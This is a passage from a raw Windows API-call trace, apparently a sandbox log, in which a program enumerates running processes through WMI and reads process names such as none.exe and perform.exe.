[7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.301] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.302] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.302] IUnknown:Release (This=0x500344) returned 0x1 [0279.303] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc178) returned 0x0 [0279.303] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc178, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.303] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc178, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702350) returned 0x0 [0279.304] WbemDefPath:IUnknown:Release (This=0x56fc178) returned 0x0 [0279.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702350, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702350) returned 0x0 [0279.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702350, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.304] WbemDefPath:IUnknown:AddRef (This=0x5702350) returned 0x3 [0279.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702350, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702350, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.304] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702350, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc188) returned 0x0 [0279.304] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc188, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.304] WbemDefPath:IUnknown:Release (This=0x56fc188) returned 0x3 [0279.304] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.305] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.305] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702350, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.305] WbemDefPath:IUnknown:Release (This=0x5702350) returned 0x2 [0279.305] WbemDefPath:IUnknown:Release (This=0x5702350) returned 0x1 [0279.305] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.305] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.305] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702350, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702350) returned 0x0 [0279.305] WbemDefPath:IUnknown:AddRef (This=0x5702350) returned 0x3 [0279.305] WbemDefPath:IUnknown:Release (This=0x5702350) returned 0x2 [0279.305] WbemDefPath:IWbemPath:SetText (This=0x5702350, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2444\"") returned 0x0 [0279.305] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.305] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.305] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.305] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.305] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.305] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.305] IWbemClassObject:Get (in: This=0x5703b48, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c6564*=0, plFlavor=0x27c6568*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="none.exe", varVal2=0x0), pType=0x27c6564*=8, plFlavor=0x27c6568*=0) returned 0x0 [0279.306] SysStringByteLen (bstr="none.exe") returned 0x10 [0279.306] SysStringByteLen (bstr="none.exe") returned 0x10 [0279.306] IWbemClassObject:Get (in: This=0x5703b48, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c6564*=8, plFlavor=0x27c6568*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="none.exe", varVal2=0x0), pType=0x27c6564*=8, plFlavor=0x27c6568*=0) returned 0x0 [0279.306] SysStringByteLen (bstr="none.exe") returned 0x10 [0279.306] SysStringByteLen (bstr="none.exe") returned 0x10 [0279.306] CoTaskMemAlloc (cb=0x4) returned 0x56fc1b8 [0279.306] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc1b8, puReturned=0x27bb39c | out: apObjects=0x56fc1b8*=0x5703ce0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.325] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5703ce0) returned 0x0 [0279.325] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.325] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.326] IUnknown:AddRef (This=0x5703ce0) returned 0x3 [0279.326] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.326] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.326] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5703ce4) returned 0x0 [0279.326] IMarshal:GetUnmarshalClass (in: This=0x5703ce4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.326] IUnknown:Release (This=0x5703ce4) returned 0x3 [0279.326] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.326] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.327] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.327] IUnknown:Release (This=0x5703ce0) returned 0x2 [0279.327] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.327] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.327] IUnknown:QueryInterface (in: This=0x5703ce0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5703ce0) returned 0x0 [0279.327] IUnknown:AddRef (This=0x5703ce0) returned 0x4 [0279.327] IUnknown:Release (This=0x5703ce0) returned 0x3 [0279.327] IUnknown:Release (This=0x5703ce0) returned 0x2 [0279.327] CoTaskMemFree (pv=0x56fc1b8) [0279.327] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.327] IUnknown:AddRef (This=0x5703ce0) returned 0x3 [0279.328] IWbemClassObject:Get (in: This=0x5703ce0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.328] IWbemClassObject:Get (in: This=0x5703ce0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.328] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x66 [0279.328] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x66 [0279.328] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.329] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.329] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.329] IUnknown:Release (This=0x500344) returned 0x1 [0279.330] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fc1b8) returned 0x0 [0279.330] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fc1b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.330] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fc1b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702430) returned 0x0 [0279.331] WbemDefPath:IUnknown:Release (This=0x56fc1b8) returned 0x0 [0279.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702430, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702430) returned 0x0 [0279.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702430, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.331] WbemDefPath:IUnknown:AddRef (This=0x5702430) returned 0x3 [0279.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702430, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702430, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702430, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fc1c8) returned 0x0 [0279.332] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fc1c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.332] WbemDefPath:IUnknown:Release (This=0x56fc1c8) returned 0x3 [0279.332] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.332] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702430, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.332] WbemDefPath:IUnknown:Release (This=0x5702430) returned 0x2 [0279.332] WbemDefPath:IUnknown:Release (This=0x5702430) returned 0x1 [0279.332] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.332] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702430, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702430) returned 0x0 [0279.332] WbemDefPath:IUnknown:AddRef (This=0x5702430) returned 0x3 [0279.332] WbemDefPath:IUnknown:Release (This=0x5702430) returned 0x2 [0279.332] WbemDefPath:IWbemPath:SetText (This=0x5702430, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2456\"") returned 0x0 [0279.332] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.332] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.333] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.333] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.333] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.333] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.333] IWbemClassObject:Get (in: This=0x5703ce0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c6dc8*=0, plFlavor=0x27c6dcc*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="perform.exe", varVal2=0x0), pType=0x27c6dc8*=8, plFlavor=0x27c6dcc*=0) returned 0x0 [0279.333] SysStringByteLen (bstr="perform.exe") returned 0x16 [0279.333] SysStringByteLen (bstr="perform.exe") returned 0x16 [0279.333] IWbemClassObject:Get (in: This=0x5703ce0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c6dc8*=8, plFlavor=0x27c6dcc*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="perform.exe", varVal2=0x0), pType=0x27c6dc8*=8, plFlavor=0x27c6dcc*=0) returned 0x0 [0279.333] SysStringByteLen (bstr="perform.exe") returned 0x16 [0279.333] SysStringByteLen (bstr="perform.exe") returned 0x16 [0279.333] CoTaskMemAlloc (cb=0x4) returned 0x56fc1f8 [0279.334] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fc1f8, puReturned=0x27bb39c | out: apObjects=0x56fc1f8*=0x5703e78, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.335] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5703e78) returned 0x0 [0279.335] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.335] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.336] IUnknown:AddRef (This=0x5703e78) returned 0x3 [0279.336] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.336] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.336] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5703e7c) returned 0x0 [0279.336] IMarshal:GetUnmarshalClass (in: This=0x5703e7c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.336] IUnknown:Release (This=0x5703e7c) returned 0x3 [0279.336] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.336] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.336] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.336] IUnknown:Release (This=0x5703e78) returned 0x2 [0279.336] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.336] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.336] IUnknown:QueryInterface (in: This=0x5703e78, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5703e78) returned 0x0 [0279.337] IUnknown:AddRef (This=0x5703e78) returned 0x4 [0279.337] IUnknown:Release (This=0x5703e78) returned 0x3 [0279.337] IUnknown:Release (This=0x5703e78) returned 0x2 [0279.337] CoTaskMemFree (pv=0x56fc1f8) [0279.337] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.337] IUnknown:AddRef (This=0x5703e78) returned 0x3 [0279.337] IWbemClassObject:Get (in: This=0x5703e78, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, 